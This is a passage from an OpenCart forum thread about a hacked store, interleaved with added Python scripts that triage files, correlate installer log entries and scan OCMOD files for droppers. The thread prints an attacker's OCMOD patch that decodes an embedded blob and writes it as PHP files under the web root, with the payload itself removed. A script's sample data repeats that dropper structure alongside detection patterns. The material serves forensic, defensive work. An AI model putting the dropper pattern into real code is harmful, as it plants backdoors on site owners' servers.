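        if m:
            yield "modified", m["live"]


# Name patterns taken from the posted listing.  The labels are this example's own.
RANDOM_PHP_RE = re.compile(r"^[a-z]{8}\.php$")
DATED_BAK_RE = re.compile(r"\.php\.\d{6}\.bak$")


def classify(status, path):
    """Coarse label so the interesting entries can be reviewed first."""
    name = path.rsplit("/", 1)[-1]
    if status == "missing":
        return "only in clean tree"
    if status == "modified":
        return "modified file (diff against clean copy)"
    if name.startswith(".") and name.endswith(".ico"):
        return "hidden .ico (check for <?php header)"
    if RANDOM_PHP_RE.match(name):
        return "random 8-letter .php"
    if name.endswith(".suspected"):
        return "quarantined by host scanner"
    if DATED_BAK_RE.search(name) or name.endswith(".ori.bak"):
        return "backup copy (.bak) beside a modified file"
    if name == "index.php":
        return "index.php added where OpenCart ships index.html"
    if name in ("3.02_conf", ".pid"):
        return "unexplained binary/state file"
    return "needs manual review"


def triage(text):
    """Return [(status, path, label)] with the 'needs manual review' rows last."""
    rows = [(s, p, classify(s, p)) for s, p in parse_diff_rq(text)]
    rows.sort(key=lambda r: r[2] == "needs manual review")
    return rows


def summary(rows):
    return Counter(label for _, _, label in rows)


if __name__ == "__main__":
    rows = triage(SAMPLE_DIFF)
    for status, path, label in rows:
        print(f"{status:8} {label:48} {path}")
    print(dict(summary(rows)))
```

The rows left as "needs manual review" are the ones a name check cannot settle, and admin/controller/design/image.php lands there for exactly the reason the post gives: it is a plausible file name in a plausible place, and only its contents (or the clean tree's lack of it) give it away.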

Post by head_dunce » Sat May 11, 2019 11:07 pm

Ok, now thinking back to the apache log I posted above. Because of the dates on the binary files, the extension would have to be from these apache logs -

Code: Select all

193.169.87.26 - - [10/Apr/2019:15:39:47 +0000] "POST /admin/index.php?route=marketplace/installer/upload&user_token=f8NiIn6RVtualcsX1njyLhavDSqXW0fe HTTP/1.1" 200 177 "http://carguygarage.org/admin/index.php?route=marketplace/installer&user_token=f8NiIn6RVtualcsX1njyLhavDSqXW0fe" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0"

193.169.87.26 - - [10/Apr/2019:15:43:05 +0000] "POST /admin/index.php?route=marketplace/installer/upload&user_token=be0AH4O6CbQ1ahjeWpsyY5L6jLIj0Szo HTTP/1.1" 200 177 "http://carguysgarage.org/admin/index.php?route=marketplace/installer&user_token=be0AH4O6CbQ1ahjeWpsyY5L6jLIj0Szo" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0"
And those two happened minutes apart.
EDIT: That IP / browser is not me, which makes this even weirder.

I just looked through my browser logs, and the only extension I downloaded that would match that was on April 4th. I had downloaded the extension and had it on my desktop for a while before I installed it.
The download was for opencart-3-x-export-import-multilingual-3-20-cloud.ocmod.zip
And was downloaded from

Code: Select all

http://opencart-extension.s3.amazonaws.com/5a74c2774856a.zip?response-content-disposition=attachment%3B+filename%3D%22opencart-3-x-export-import-multilingual-3-20-cloud.ocmod.zip%22&AWSAccessKeyId=AKIAJAKN3JSFG324O44A&Expires=1554407274&Signature=cwpR6KiZQlJk0j4lqKexsh5OCPA%3D
So if the only way this happened was from an extension, I think this one has been compromised:
https://www.opencart.com/index.php?rout ... sion_id=17
Last edited by head_dunce on Sun May 12, 2019 9:49 am, edited 1 time in total.

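Correlating those access-log lines by admin session, as an added example (my own Python, not the poster's commands and not OpenCart code). It groups the marketplace/installer/upload and marketplace/install/unzip requests by the user_token in the query string, records the source addresses and user agents seen under each token, and flags every session with a request from outside a trusted range. The sample is built from the log lines quoted in this post and from the unzip lines the same poster quotes further down; the 209.59.90.0/24 trusted range is an assumption standing in for the owner's own addresses, since the thread only says that the 209.59.90.x requests were his.

```python
import re
import ipaddress
from datetime import datetime
from urllib.parse import urlsplit, parse_qs

# Constructed sample: the installer-related access-log lines quoted in this
# thread (Apache combined format), one request per line.
SAMPLE_LOG = """\
209.59.90.220 - - [04/Apr/2019:19:48:23 +0000] "GET /admin/index.php?route=marketplace/install/unzip&user_token=QA61QOnpM1CSLaeGsbAluGxoTi4erooE&extension_install_id=1 HTTP/1.1" 200 178 "http://carguygarage.org/admin/index.php?route=marketplace/installer&user_token=QA61QOnpM1CSLaeGsbAluGxoTi4erooE" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36"
193.169.87.26 - - [10/Apr/2019:15:39:47 +0000] "POST /admin/index.php?route=marketplace/installer/upload&user_token=f8NiIn6RVtualcsX1njyLhavDSqXW0fe HTTP/1.1" 200 177 "http://carguygarage.org/admin/index.php?route=marketplace/installer&user_token=f8NiIn6RVtualcsX1njyLhavDSqXW0fe" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0"
193.169.87.26 - - [10/Apr/2019:15:39:50 +0000] "GET /admin/index.php?route=marketplace/install/unzip&user_token=f8NiIn6RVtualcsX1njyLhavDSqXW0fe&extension_install_id=2 HTTP/1.1" 200 178 "http://carguygarage.org/admin/index.php?route=marketplace/installer&user_token=f8NiIn6RVtualcsX1njyLhavDSqXW0fe" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0"
193.169.87.26 - - [10/Apr/2019:15:43:05 +0000] "POST /admin/index.php?route=marketplace/installer/upload&user_token=be0AH4O6CbQ1ahjeWpsyY5L6jLIj0Szo HTTP/1.1" 200 177 "http://carguysgarage.org/admin/index.php?route=marketplace/installer&user_token=be0AH4O6CbQ1ahjeWpsyY5L6jLIj0Szo" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0"
193.169.87.26 - - [10/Apr/2019:15:43:08 +0000] "GET /admin/index.php?route=marketplace/install/unzip&user_token=be0AH4O6CbQ1ahjeWpsyY5L6jLIj0Szo&extension_install_id=3 HTTP/1.1" 200 178 "http://carguysgarage.org/admin/index.php?route=marketplace/installer&user_token=be0AH4O6CbQ1ahjeWpsyY5L6jLIj0Szo" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0"
209.59.90.198 - - [08/May/2019:01:42:10 +0000] "POST /admin/index.php?route=marketplace/installer/upload&user_token=INEqC1uLyaTDcErW9oqZBiyPyYYDBZGL HTTP/1.1" 200 177 "http://carguygarage.org/admin/index.php?route=marketplace/installer&user_token=INEqC1uLyaTDcErW9oqZBiyPyYYDBZGL" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36"
"""

# Assumption for this example: networks the store owner connects from.  The
# thread only says the 209.59.90.x requests were the owner's; the /24 is a guess.
TRUSTED_NETWORKS = [ipaddress.ip_network("209.59.90.0/24")]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# OpenCart 3 installer steps as they appear in the route= parameter.
INSTALLER_STEPS = {
    "marketplace/installer/upload": "upload",
    "marketplace/install/unzip": "unzip",
}


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    query = parse_qs(urlsplit(rec["target"]).query)
    rec["route"] = query.get("route", [""])[0]
    rec["user_token"] = query.get("user_token", [""])[0]
    return rec


def build_install_sessions(lines):
    """Group installer requests by admin session, i.e. by user_token."""
    sessions = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["route"] not in INSTALLER_STEPS:
            continue
        s = sessions.setdefault(rec["user_token"], {
            "ips": set(), "uas": set(), "steps": [],
            "first": rec["ts"], "last": rec["ts"],
        })
        s["ips"].add(rec["ip"])
        s["uas"].add(rec["ua"])
        s["steps"].append(INSTALLER_STEPS[rec["route"]])
        s["first"] = min(s["first"], rec["ts"])
        s["last"] = max(s["last"], rec["ts"])
    for s in sessions.values():
        # Span between the first and last installer step seen for this token.
        s["seconds"] = int((s["last"] - s["first"]).total_seconds())
    return sessions


def flag_untrusted_installs(sessions, trusted_networks):
    """Tokens with at least one installer request from outside the trusted networks."""
    flagged = []
    for token, s in sessions.items():
        for ip in s["ips"]:
            addr = ipaddress.ip_address(ip)
            if not any(addr in net for net in trusted_networks):
                flagged.append(token)
                break
    return flagged


if __name__ == "__main__":
    sessions = build_install_sessions(SAMPLE_LOG.splitlines())
    for token in flag_untrusted_installs(sessions, TRUSTED_NETWORKS):
        s = sessions[token]
        print(f"{s['first']:%Y-%m-%d %H:%M:%S} {','.join(sorted(s['ips']))} "
              f"token={token} steps={'>'.join(s['steps'])} span={s['seconds']}s")
```

Grouping by user_token rather than by IP is what makes the two April 10 installs stand out as separate admin logins from the same foreign address, and it is also the join key you need if you later pull the matching admin login events from the database or the OpenCart error log; the same parser works over a full access log, the sample here is just the lines the thread quotes.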

Post by head_dunce » Sat May 11, 2019 11:13 pm

And I am looking at the install zip, here is something interesting --

Code: Select all

	
	protected function curl_get_contents($url) {
		$ch = curl_init();
		curl_setopt($ch, CURLOPT_URL, $url);
		curl_setopt($ch, CURLOPT_HEADER, 0);
		curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
		$output = curl_exec($ch);
		curl_close($ch);
		return $output;
	}


	public function getNotifications() {
		$language_code = $this->config->get( 'config_admin_language' );
		$result = $this->curl_get_contents("http://www.mhccorp.com/index.php?route=information/message&type=tool_export_import_3_20&language_code=$language_code");
		if (stripos($result,'<html') !== false) {
			return '';
		}
		return $result;
	}
	
	


Post by IP_CAM » Sun May 12, 2019 9:01 am

Well, I'm not sure what you want to show us; you just seem to have some funny files and code in your software, and experience problems never seen on this forum before. But your OC test site is not linked anywhere, so it's not possible to find out anything, and it's of not much use to keep on posting unreadable code, guaranteed not coming from OC or JNeuhoff's fine import/export extension.

Ernie

My Github OC Site: https://github.com/IP-CAM
5'200 + FREE OC Extensions, on the World's largest private Github OC Repository Archive Site.


User avatar
Legendary Member

Posts

Joined
Tue Mar 04, 2014 1:37 am
Location - Switzerland

Post by head_dunce » Sun May 12, 2019 9:34 am

I did post a couple of encrypted files, but it's odd you call log files unreadable? Odd you call that last chunk of code I posted unreadable? And it was noted in a previous post that an extension shouldn't phone home, when here is clearly code phoning home.


Post by letxobnav » Sun May 12, 2019 11:02 am

all that call does is retrieve:

Welcome to the Export/Import Tool (V3.20) for OpenCart. If you need a customized version, <a href="http://www.mhccorp.com/index.php?route= ... ct"><u>let us know</u></a> and we can create one for a charge.

I suspect you have a hosting security issue, not an extension issue, digital ocean.

Crystal Light Centrum Taiwan
Extensions: MailQueue | SUKHR | VBoces

“Data security is paramount at [...], and we are committed to protecting the privacy of anyone who is associated with our [...]. We’ve made a lot of improvements and will continue to make them.”
When you know your life savings are gone.


User avatar
Expert Member

Posts

Joined
Fri Aug 18, 2017 4:35 pm
Location - Taiwan

Post by head_dunce » Sun May 12, 2019 11:24 am

letxobnav wrote:
Sun May 12, 2019 11:02 am
all that call does is retrieve:

Welcome to the Export/Import Tool (V3.20) for OpenCart. If you need a customized version, <a href="http://www.mhccorp.com/index.php?route= ... ct"><u>let us know</u></a> and we can create one for a charge.

I suspect you have a hosting security issue, not an extension issue, digital ocean.
It retrieves whatever the server gives up. Since you looked at the page with a web browser, the code can say "hey, someone that's probably a person is looking at me, let's just say hello", but if it saw that it was a script that looked at that page, it could serve something completely different. And if the person who owns that domain decides not to renew it, the new owner can do whatever they'd like when the script calls home. This is not a DigitalOcean problem. This is an OC extension problem. That extension is still on the official download area as I type this, and it seems to have been for many, many years. That's scary.

There is a possibility someone/something logged into the admin screen on OC and did things. I had a very standard password when I installed OC and posted the domain on these forums when I first installed it. (Again, I never had sensitive data on this server, so I never worried about it.) Oddly, the two Apache log entries that seem to show the problem installs are from IPs and browsers that were not me. Even more oddly, the Apache logs are missing for when I did do the install for that extension. The only extension install that I see in the Apache logs that I know is me is the recent attempt at the twig dump extension.


Post by head_dunce » Sun May 12, 2019 12:25 pm

Staring at more logs - I see that the file upload extension must have been installed on April 4th because there are errors with the upload file formats noted in the OC log. Looking back at the apache logs, the first log isn't until April 7th which explains why I don't see the install of the extension.


Post by letxobnav » Sun May 12, 2019 1:17 pm

Well, up until now you are merely speculating without any evidence one way or the other.
Suggest you start logging POSTs made to your server, not just the request but the content; then you would have known.

Besides, I did not say this is a Digital Ocean problem; I said Digital Ocean is the problem.


Post by head_dunce » Sun May 12, 2019 6:23 pm

Apache was logging posts to the server


Post by head_dunce » Sun May 12, 2019 7:13 pm

And here's another hacked OpenCart that is not me; that's now 3 known with this.
Original post: https://opencartforum.com/topic/136313- ... NewComment
Translated: https://translate.google.com/translate? ... rev=search


Post by head_dunce » Mon May 13, 2019 4:11 am

Pretty sure I see what happened now. I have full backups of the server at random dates. I just took backups when I remembered, usually after I made progress with this OC install project. Ironically I seem to have caught this nasty script at the point where it was installed on the server through the OC extensions but before the binary was created. This is good news because it seems once the script is executed, it cleans up after itself.

From apache logs - here is me installing the file upload extension on April 4th

Code: Select all

209.59.90.220 - - [04/Apr/2019:19:48:23 +0000] "GET /admin/index.php?route=marketplace/install/unzip&user_token=QA61QOnpM1CSLaeGsbAluGxoTi4erooE&extension_install_id=1 HTTP/1.1" 200 178 "http://carguygarage.org/admin/index.php?route=marketplace/installer&user_token=QA61QOnpM1CSLaeGsbAluGxoTi4erooE" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36"
And here is the apache log of someone else installing some other extension on April 10th

Code: Select all

193.169.87.26 - - [10/Apr/2019:15:39:50 +0000] "GET /admin/index.php?route=marketplace/install/unzip&user_token=f8NiIn6RVtualcsX1njyLhavDSqXW0fe&extension_install_id=2 HTTP/1.1" 200 178 "http://carguygarage.org/admin/index.php?route=marketplace/installer&user_token=f8NiIn6RVtualcsX1njyLhavDSqXW0fe" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0"
193.169.87.26 - - [10/Apr/2019:15:43:08 +0000] "GET /admin/index.php?route=marketplace/install/unzip&user_token=be0AH4O6CbQ1ahjeWpsyY5L6jLIj0Szo&extension_install_id=3 HTTP/1.1" 200 178 "http://carguysgarage.org/admin/index.php?route=marketplace/installer&user_token=be0AH4O6CbQ1ahjeWpsyY5L6jLIj0Szo" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0"
And here is the XML for the installed extension:

Code:

<?xml version="1.0" encoding="utf-8"?>
<modification>
    <name><![CDATA[OCstore]]></name>
    <code>OCstore</code>
    <version>1.0</version>
    <author>teknohiz.com</author>
    <link>teknohiz.com</link>
    <file path="catalog/controller/common/footer.php">
        <operation error="skip">
            <search><![CDATA[$data['text_newsletter'] = $this->language->get('text_newsletter');]]></search>
            <add position="after"><![CDATA[
                $datasss = base64_decode(gzinflate(base64_decode('
                ----- REMOVED ENCODED PART FOR THIS FORUM POST ---
                ')));
                $fp = fopen($_SERVER['DOCUMENT_ROOT'].'/admin/controller/design/image.php', 'w');
                fwrite($fp, $datasss.PHP_EOL);
                fclose($fp);
                $fp = fopen($_SERVER['DOCUMENT_ROOT'].'/catalog/controller/affiliate/image.php', 'w');
                fwrite($fp, $datasss.PHP_EOL);
                fclose($fp);
            ]]></add>
        </operation>
        <operation error="skip">
            <search><![CDATA[$data['newsletter'] = $this->url->link('account/newsletter', '', true);]]></search>
            <add position="after"><![CDATA[
                $datasss = base64_decode(gzinflate(base64_decode('
                ----- REMOVED ENCODED PART FOR THIS FORUM POST ---
                ')));
                $fp = fopen($_SERVER['DOCUMENT_ROOT'].'/admin/controller/design/image.php', 'w');
                fwrite($fp, $datasss.PHP_EOL);
                fclose($fp);
                $fp = fopen($_SERVER['DOCUMENT_ROOT'].'/catalog/controller/affiliate/image.php', 'w');
                fwrite($fp, $datasss.PHP_EOL);
                fclose($fp);
            ]]></add>
        </operation>
    </file>
</modification>
So now I know this was done via the OC extensions and not via SSH, FTP or anything else. My guess is someone/something logged into the admin part of OC and installed this script. It wouldn't have been very hard to guess the admin password I was using; buzzing through the usual passwords would have found it. And now I'll hand this server backup off to the team that manages OC, hopefully it can be useful.

Jim
https://www.carguygarage.com
Yahoo Store since 2006 moved to OpenCart on January 24, 2020
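The post above reconstructs the intrusion from two artefacts: the admin installer requests in the Apache access log, and an OCMOD modification file whose `<add>` blocks decode an embedded blob and write it out as a new PHP file under the document root. The script below is an added example (not code from the forum thread, from OpenCart or from any of the posters) that automates both checks as a defender would: it pulls every request to the `marketplace/install...` admin routes out of combined-format log lines and counts them per source address, and it scans a modification XML for the decode-and-write pattern. The log lines and the OCMOD document are constructed samples shaped like the ones in the thread (documentation addresses, dummy tokens, a placeholder instead of the encoded payload); the pattern list, function names and the assumption that every install step lives under that route prefix are mine.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit
from xml.etree import ElementTree as ET

# Apache "combined" log format, matching the lines posted in the thread. Only the
# fields needed for triage are captured; referer and user agent are left alone.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Assumption: every admin request under this prefix (installer/upload,
# install/unzip, ...) is one step of an extension install in OpenCart 3.x.
INSTALLER_ROUTE_PREFIX = "marketplace/install"

# Constructed sample log (RFC 5737 documentation addresses, dummy tokens): one
# install by the owner, then an upload and unzip from a second address.
SAMPLE_LOG = """\
203.0.113.10 - - [04/Apr/2019:19:48:23 +0000] "GET /admin/index.php?route=marketplace/install/unzip&user_token=TOKENAAAA&extension_install_id=1 HTTP/1.1" 200 178 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Apr/2019:15:39:47 +0000] "POST /admin/index.php?route=marketplace/installer/upload&user_token=TOKENBBBB HTTP/1.1" 200 177 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Apr/2019:15:39:50 +0000] "GET /admin/index.php?route=marketplace/install/unzip&user_token=TOKENBBBB&extension_install_id=2 HTTP/1.1" 200 178 "-" "Mozilla/5.0"
203.0.113.10 - - [10/Apr/2019:16:00:00 +0000] "GET /index.php?route=common/home HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""


def extension_install_events(log_text):
    """Return one dict per request to the OpenCart extension installer."""
    events = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = parse_qs(urlsplit(m.group("target")).query)
        route = query.get("route", [""])[0]
        if not route.startswith(INSTALLER_ROUTE_PREFIX):
            continue
        events.append({
            "ip": m.group("ip"),
            "ts": m.group("ts"),
            "method": m.group("method"),
            "status": int(m.group("status")),
            "route": route,
            "user_token": query.get("user_token", [""])[0],
            "extension_install_id": query.get("extension_install_id", [None])[0],
        })
    return events


def installs_by_ip(events):
    """Count installer requests per source address; an address the owner does
    not recognise is the first thing to look at."""
    return Counter(e["ip"] for e in events)


# PHP constructs that have no business in an OCMOD patch to a storefront
# controller: decoding an embedded blob and writing it to a fresh .php file
# under the document root is the dropper pattern from the thread.
SUSPICIOUS_PHP = [
    r"base64_decode\s*\(",
    r"gzinflate\s*\(",
    r"\beval\s*\(",
    r"fopen\s*\([^)]*['\"]w",   # file opened for writing
    r"file_put_contents\s*\(",
    r"\$_SERVER\[\s*['\"]DOCUMENT_ROOT['\"]\s*\]",
]

# Constructed OCMOD: the first <file> mimics the dropper structure with the
# payload replaced by a placeholder, the second is a benign template edit.
SAMPLE_OCMOD = """<?xml version="1.0" encoding="utf-8"?>
<modification>
  <name><![CDATA[constructed sample]]></name>
  <file path="catalog/controller/common/footer.php">
    <operation error="skip">
      <search><![CDATA[$data['text_newsletter'] = $this->language->get('text_newsletter');]]></search>
      <add position="after"><![CDATA[
        $payload = base64_decode(gzinflate(base64_decode('PLACEHOLDER')));
        $fp = fopen($_SERVER['DOCUMENT_ROOT'].'/admin/controller/design/image.php', 'w');
        fwrite($fp, $payload.PHP_EOL);
        fclose($fp);
      ]]></add>
    </operation>
  </file>
  <file path="catalog/controller/common/header.php">
    <operation>
      <search><![CDATA[$data['title'] = $this->document->getTitle();]]></search>
      <add position="after"><![CDATA[$data['banner_text'] = 'Spring sale';]]></add>
    </operation>
  </file>
</modification>
"""


def scan_ocmod(xml_text):
    """Flag every <add> block whose PHP matches one of the dropper patterns."""
    findings = []
    root = ET.fromstring(xml_text)
    for file_el in root.iter("file"):
        target = file_el.get("path", "")
        for add_el in file_el.iter("add"):
            code = add_el.text or ""
            hits = [p for p in SUSPICIOUS_PHP if re.search(p, code)]
            if hits:
                findings.append({"target": target, "patterns": hits})
    return findings


if __name__ == "__main__":
    for ip, n in installs_by_ip(extension_install_events(SAMPLE_LOG)).items():
        print(f"{ip}: {n} installer request(s)")
    for f in scan_ocmod(SAMPLE_OCMOD):
        print(f"suspicious OCMOD patch to {f['target']}: {', '.join(f['patterns'])}")
```

Run against a real access log, the per-IP count immediately separates the owner's own install from anyone else's, and the `user_token` values let you tie an upload to the unzip that followed it, as the thread does by hand. The OCMOD scanner is deliberately pattern based: any storefront patch that opens a file for writing or decodes an embedded blob deserves a manual read, whether or not it is this particular dropper.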



Post by IP_CAM » Mon May 13, 2019 4:32 am

File sent to Kaspersky Lab. (Name changed, to make passing my Firewall possible... ;) )

Code:

Thank you for contacting Kaspersky Lab
The files have been scanned in automatic mode.
Malicious code has been detected in the following files:
3_02_conf - HEUR:Trojan.Linux.Agent.go
We will thoroughly analyze the files you sent. If the result of the analysis is different from this automatic scan result, you will be notified via email.
This is an automatically generated message. Please do not reply to it.
Anti-Virus Lab, Kaspersky Lab HQ
"39A/3 Leningradskoe Shosse, Moscow, 125212, Russia
Tel./Fax: + 7 (495) 797 8700 
http://www.kaspersky.com https://www.securelist.com"
---
Sent: 5/12/2019 11:21:00 PM
To: newvirus@kaspersky.com
Subject: Anti-virus Lab replies to your request [VD3][FILE:2][LN:en]
LANG: [LN:en]

My Github OC Site: https://github.com/IP-CAM
5'200 + FREE OC Extensions, on the World's largest private Github OC Repository Archive Site.



Post by head_dunce » Mon May 13, 2019 4:47 am

IP_CAM wrote:
Mon May 13, 2019 4:32 am
File sent to Kaspersky Lab. (Name changed, to make passing my Firewall possible... ;) )
So you were hit with it too?

Jim
https://www.carguygarage.com
Yahoo Store since 2006 moved to OpenCart on January 24, 2020



Post by IP_CAM » Mon May 13, 2019 5:15 am

Well, it did not hit me :laugh: , I was looking for it! ;)
http://giamsat365.com/admin/
I am too old to get something like that by accident, or by browsing around in 'eastern europe places', looking for unnoticed yet Goodies. Besides the fact that most of today's bad code no longer hurts a well-done XP ;)

One more good reason and excuse not to follow the masses of - can't wait to screw up - Latest-Lovers ... :D
Ernie

My Github OC Site: https://github.com/IP-CAM
5'200 + FREE OC Extensions, on the World's largest private Github OC Repository Archive Site.

